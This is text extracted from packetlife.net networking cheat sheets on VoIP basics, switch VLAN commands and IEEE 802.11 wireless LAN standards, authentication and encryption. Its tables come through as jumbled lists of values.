Forms a trunk only if requested by the far end
access
Will never form a trunk
Troubleshooting
show vlan
show interface [status | switchport]
show interface trunk
show vtp status
show vtp password
v2.0

VOIP BASICS

packetlife.net

Pulse Code Modulation (PCM)
14
12
10
8
6
4
2
0

13.6

13.5
12.4

12.3

9.2

9.1

6.0

5.9

0.9

1.0

2.8

2.7

14
12
10
8
6
4
2
0

Power Over Ethernet (PoE)
Cisco Inline Power (ILP)

14
12
10
8
6
4
2
0

Sampling

Pre-standard; employs a 340 kHz tone
to detect devices; power needs
communicated via CDP

IEEE 802.3af

Quantization

Detects power requirements of PoE
device by the line resistance present

Encoding

IEEE 802.3at

Sampling

Uses LLDP to negotiate delivery of up
to 25 watts in .10 W intervals

8000 discrete signal measurements are taken at equal intervals every second

Quantization

IEEE 802.3af Classes

The level of each sample is rounded to the nearest expressible value

Encoding

Digital values are encoded as binary numbers for encapsulation

Compression (Optional)

Voice Codecs
G.722 SB-ADPCM 4.13
G.711 PCM 4.1
iLBC 4.1
G.729 CS-ACELP 3.92
G.726 ADPCM 3.85
G.729a CS-ACELP 3.7
G.728 LD-CELP 3.61

3 15.4 W

1 4W

4 Reserved

2 7W

The digital signal is compressed in real time to consume less bandwidth

MOS

0 15.4 W

IP Phone Boot Process

Bandwidth

Complexity

Free

48-64 kbps

Medium

Yes

64 kbps

Low

Yes

15.2 kbps

High

Yes

8 kbps

High

No

32 kbps

Medium

Yes

8 kbps

Medium

No

16 kbps

High

No

3

2
5

4

1

TFTP Server

Call Server

1. Power Over Ethernet (Optional)
Power is supplied via IEEE 802.3af/at or Cisco ILP

Signaling Protocols

2. VLANs Learned via CDP or LLDP

ITU-T H.323

Originally designed for multimedia transmission over ISDN; mature
and widely supported; peer-to-peer call control

Voice and data VLANs communicated via CDP/LLDP

3. IP Assignment via DHCP

Session Initiation Protocol (SIP)

The phone sends a DHCP request in the voice VLAN;
the response includes an IP and DHCP option 150

Text-based, similar in nature to HTTP; defined in RFC 3261; peerto-peer call control

4. Configuration Retrieved via TFTP

Media Gateway Control Protocol (MGCP)
Employs centralized call control; defined in RFC 3661

The phone retrieves its configuration from one of the
TFTP servers specified in the DHCP option

5. Registration

Skinny Client Control Protocol (SCCP)
Cisco-proprietary; limited support on gateways; centralized control

Calculating Required Bandwidth

The phone registers with the call server(s) specified
in its configuration

Access Switch Port Configuration

G.711/Ethernet Example

Codec Payload
(Bitrate × Sample Size)

64 Kbps × 20 msec

160 B

L2 Overhead Ethernet (18) + 802.1Q (4) +

22 B

L3 Overhead IP (20)

+

20 B

L4 Overhead UDP (8) + RTP (12)

+

20 B

Packets per Second 1000 msec / 20 msec
Total Bandwidth
by Jeremy Stretch

× 50 pps
88.8 Kbps

interface FastEthernet0/1
! Configure data and voice access VLANs
switchport access vlan 
switchport voice vlan 
! Trust ingress QoS markings
mls qos trust cos
! Optionally pre-allocate power for the port
power inline static [max ]

v1.0

IEEE 802.11 WLAN · PART 1

packetlife.net

IEEE Standards
802.11a

802.11b

802.11g

802.11n

11 Mbps

54 Mbps

300 Mbps

2.4 GHz

2.4 GHz

2.4/5 GHz

Modulation OFDM

DSSS

DSSS/OFDM

OFDM

Channels (FCC/ETSI) 21/19

11/13

11/13

32/32

1999

2003

2009

Maximum Throughput 54 Mbps
Frequency 5 GHz

Ratified 1999
WLAN Types
Ad Hoc
A WLAN between isolated stations with
no central point of control; an IBSS

WLAN Components
IBSS

BSS

ESS

BSS

Infrastructure
A WLAN attached to a wired network via
an access point; a BSS or ESS
Frame Types
Type

Class

Association

Management

Authentication

Management

Probe

Management

Beacon

Management

Request to Send (RTS)

Control

Clear to Send (CTS)

Control

Acknowledgment (ACK)

Control

Data

Data
Client Association

Probe Request
Probe Response
Authentication Request
Authentication Response
Association Request
Association Response
Modulations
Scheme

DSSS

OFDM

Modulation

Throughput

DBPSK

1 Mbps

DQPSK

2 Mbps

CCK

5.5/11 Mbps

BPSK

6/9 Mbps

QPSK

12/18 Mbps

16-QAM

24/36 Mbps

64-QAM

48/54 Mbps

by Jeremy Stretch

DS

Basic Service Area (BSA)
The physical area covered by the wireless signal of a BSS
Basic Service Set (BSS)
A set of stations and/or access points which can directly
communicate via a wireless medium
Distribution System (DS)
The wired infrastructure connecting multiple BSSs to form an ESS
Extended Service Set (ESS)
A set of multiple BSSs connected by a DS which appear to wireless
stations as a single BSS
Independent BSS (IBSS)
An isolated BSS with no connection to a DS; an ad hoc WLAN
Measuring RF Signal Strength
Decibel (dB)
An expression of signal strength as compared to a reference signal;
calculated as 10log10(signal/reference)
dBm · Signal strength compared to a 1 milliwatt signal
dBw · Signal strength compared to a 1 watt signal
dBi · Compares forward antenna gain to that of an isotropic antenna
Terminology
Basic Service Set Identifier (BSSID)
A MAC address which serves to uniquely identify a BSS
Service Set Identifier (SSID)
A human-friendly text string which identifies a BSS; 1-32 characters
Carrier Sense Multiple Access/Collision Avoidance (CSMA/CA)
The mechanism which facilitates efficient communication across a
shared wireless medium (provided by DCF or PCF)
Effective Isotropic Radiated Power (EIRP)
Net signal strength (transmitter power + antenna gain - cable loss)
v2.2

IEEE 802.11 WLAN · PART 2

packetlife.net

Distributed Coordination Function (DCF)
DIFS

DIFS

DIFS

DIFS

A

Frame

B

Deferral Period

C

Random Backoff

D

Contention Window
Interframe Spacing

Client Authentication

Short IFS (SIFS)
Used to provide minimal spacing delay between
control frames or data fragments

Open · No authentication is used

DCF IFS (DIFS)
Normal spacing enforced under DCF for management
and non-fragment data frames

Lightweight EAP (LEAP)
Cisco-proprietary EAP method introduced to provide
dynamic keying for WEP (deprecated)

Arbitrated IFS (AIFS)
Variable spacing calculated to accommodate differing
qualities of service (QoS)
Extended IFS (EIFS)
Extended delay imposed after errors are detected in a
received frame
Encryption Schemes

Pre-shared Encryption Keys
Keys are manually distributed among clients and APs

EAP-TLS
Employs Transport Layer Security (TLS); PKI
certificates are required on the AP and clients
EAP-TTLS
Clients authenticate the AP via PKI, then form a secure
tunnel inside which the client authentication takes
place (clients do not need PKI certificates)

Wired Equivalent Privacy (WEP)
Flawed RC4 implementation using a 40- or 104-bit
pre-shared encryption key (deprecated)

Protected EAP (PEAP)
A proposal by Cisco, Microsoft, and RSA which employs
a secure tunnel for client authentication like EAP-TTLS

Wi-Fi Protected Access (WPA)
Implements the improved RC4-based encryption
Temporal Key Integrity Protocol (TKIP) which can
operate on WEP-capable hardware

EAP-FAST
Developed by Cisco to replace LEAP; establishes a
secure tunnel using a Protected Access Credential
(PAC) in the absence of PKI certificates

IEEE 802.11i (WPA2)
IEEE standard developed to replace WPA; requires a
new generation of hardware to implement significantly
stronger AES-based CCMP encryption

RF Signal Interference
Reflection

Scattering

Absorption

Quality of Service Markings
WMM

802.11e

802.1p

Platinum

7/6

6/5

Gold

5/4

4/3

Silver

3/0

0

Bronze

2/1

2/1

Wi-Fi Multimedia (WMM)
A Wi-Fi Alliance certification for QoS; a subset of
802.11e QoS
IEEE 802.11e
Official IEEE WLAN QoS standard ratified in 2005;
replaces WMM
IEEE 802.1p
QoS markings in the 802.1Q header on wired Ethernet
by Jeremy Stretch

Refraction

Diffraction

Antenna Types
Directional · Radiates power in one focused direction
Omnidirectional
Radiates power uniformly across a plane
Isotropic
A theoretical antenna referenced when measuring
effective radiated power
v2.2

Objects

Lists

Document Outline


Version of (X)HTML



Ordered list